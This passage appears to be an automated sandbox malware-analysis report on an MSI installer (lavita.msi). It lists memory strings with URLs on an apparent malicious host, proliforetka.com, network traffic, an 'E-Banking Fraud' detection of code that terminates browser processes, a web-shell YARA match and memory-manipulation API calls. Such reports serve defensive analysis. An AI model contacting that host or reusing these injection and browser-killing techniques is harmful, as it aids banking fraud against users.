            Source: explorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2405576453.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
            Source: explorer.exe, 00000007.00000000.2405576453.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4614759735.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
            Source: explorer.exe, 00000007.00000002.4615738228.000000000C3AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4615738228.000000000C383000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387418661.000000000C488000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4616007306.000000000C474000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387199626.000000000C3A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/
            Source: explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387199626.000000000C3A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/1
            Source: explorer.exe, 00000007.00000002.4615738228.000000000C3AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/71
            Source: explorer.exe, 00000007.00000003.4387418661.000000000C488000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/F
            Source: explorer.exe, 00000007.00000002.4616007306.000000000C474000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/SIE
            Source: explorer.exe, 00000007.00000002.4615738228.000000000C383000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/_
            Source: explorer.exe, 00000007.00000002.4615738228.000000000C3AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/r
            Source: explorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4616007306.000000000C474000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3496211531.0000000008BA0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/test/
            Source: explorer.exe, 00000007.00000002.4616007306.000000000C474000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/test/1
            Source: explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/test/6
            Source: explorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/test/D
            Source: explorer.exe, 00000007.00000002.4616007306.000000000C474000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/test/MenuArray_205618
            Source: explorer.exe, 00000007.00000002.4601834591.00000000032B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/test/P
            Source: explorer.exe, 00000007.00000002.4614759735.000000000C354000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/test/r
            Source: explorer.exe, 00000007.00000002.4614759735.000000000C354000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/test/y
            Source: explorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://proliforetka.com/u
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000007.00000003.4387068567.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4610617935.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2403423241.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979103692.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
            Source: explorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2405576453.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: https://www.advancedinstaller.com
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: https://www.thawte.com/cps0/
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: https://www.thawte.com/repository0W
            Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
            Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
            Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
            Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
            Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
            Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknownHTTPS traffic detected: 172.67.161.60:443 -> 192.168.2.6:49935 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49959 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49978 version: TLS 1.2

            E-Banking Fraud

            barindex
            Checks if browser processes are running
            Source: C:\Windows\explorer.exeCode function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, chrome.exe7_2_0B844948
            Source: C:\Windows\explorer.exeCode function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, iexplore.exe7_2_0B844948

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
            Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\System32\rundll32.exeCode function: 4_3_000001DA0319D270 NtAllocateVirtualMemory,4_3_000001DA0319D270
            Source: C:\Windows\System32\rundll32.exeCode function: 4_3_000001DA0319D2E0 NtProtectVirtualMemory,4_3_000001DA0319D2E0
            Source: C:\Windows\explorer.exeCode function: 7_2_02F282B4 NtFreeVirtualMemory,7_2_02F282B4
            Source: C:\Windows\explorer.exeCode function: 7_2_02F2B388 NtAllocateVirtualMemory,7_2_02F2B388
            Source: C:\Windows\explorer.exeCode function: 7_2_02F2C704 NtDelayExecution,7_2_02F2C704
            Source: C:\Windows\explorer.exeCode function: 7_2_02F280B8 RtlInitUnicodeString,NtCreateFile,7_2_02F280B8
            Source: C:\Windows\explorer.exeCode function: 7_2_02F28240 NtClose,7_2_02F28240
            Source: C:\Windows\explorer.exeCode function: 7_2_02F281C8 NtWriteFile,7_2_02F281C8
            Source: C:\Windows\explorer.exeCode function: 7_2_02F301A0 NtFreeVirtualMemory,CreateMutexExW,7_2_02F301A0
            Source: C:\Windows\explorer.exeCode function: 7_2_02F30130 NtAllocateVirtualMemory,7_2_02F30130
            Source: C:\Windows\explorer.exeCode function: 7_2_0B84248C NtFreeVirtualMemory,7_2_0B84248C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B84241C NtAllocateVirtualMemory,7_2_0B84241C
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\42c1d8.msiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC2F1.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC35F.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC39F.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC3DE.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC4AA.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIC2F1.tmpJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DCA4C04_2_00007FFD92DCA4C0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DC45D04_2_00007FFD92DC45D0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92ED14104_2_00007FFD92ED1410
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92FD91F84_2_00007FFD92FD91F8
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB77804_2_00007FFD92DB7780
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBD4C04_2_00007FFD92DBD4C0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBCA504_2_00007FFD92DBCA50
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB1D704_2_00007FFD92DB1D70
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DC18D04_2_00007FFD92DC18D0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB38704_2_00007FFD92DB3870
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB37904_2_00007FFD92DB3790
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBFAC04_2_00007FFD92DBFAC0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBEB004_2_00007FFD92DBEB00
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB38704_2_00007FFD92DB3870
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB38704_2_00007FFD92DB3870
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB4BE04_2_00007FFD92DB4BE0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBE5904_2_00007FFD92DBE590
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92EE03E04_2_00007FFD92EE03E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBF5C04_2_00007FFD92DBF5C0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92EF81504_2_00007FFD92EF8150
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBE6804_2_00007FFD92DBE680
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBD0C04_2_00007FFD92DBD0C0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DC54B04_2_00007FFD92DC54B0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DC39704_2_00007FFD92DC3970
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB55B04_2_00007FFD92DB55B0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB40B04_2_00007FFD92DB40B0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB30504_2_00007FFD92DB3050
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB1D604_2_00007FFD92DB1D60
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB70204_2_00007FFD92DB7020
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB8CC04_2_00007FFD92DB8CC0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB42A04_2_00007FFD92DB42A0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB8CC04_2_00007FFD92DB8CC0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB83004_2_00007FFD92DB8300
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB83004_2_00007FFD92DB8300
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB42A04_2_00007FFD92DB42A0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBC7B04_2_00007FFD92DBC7B0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92EC38E04_2_00007FFD92EC38E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB42A04_2_00007FFD92DB42A0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB83004_2_00007FFD92DB8300
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB42A04_2_00007FFD92DB42A0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB4BE04_2_00007FFD92DB4BE0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DCA3C04_2_00007FFD92DCA3C0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DCA3604_2_00007FFD92DCA360
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DCA1004_2_00007FFD92DCA100
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92EC20B04_2_00007FFD92EC20B0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DCA0A04_2_00007FFD92DCA0A0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DCA2504_2_00007FFD92DCA250
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DCA6E04_2_00007FFD92DCA6E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DCA8A04_2_00007FFD92DCA8A0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DCAA304_2_00007FFD92DCAA30
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBAF904_2_00007FFD92DBAF90
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92ED2E504_2_00007FFD92ED2E50
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB29204_2_00007FFD92DB2920
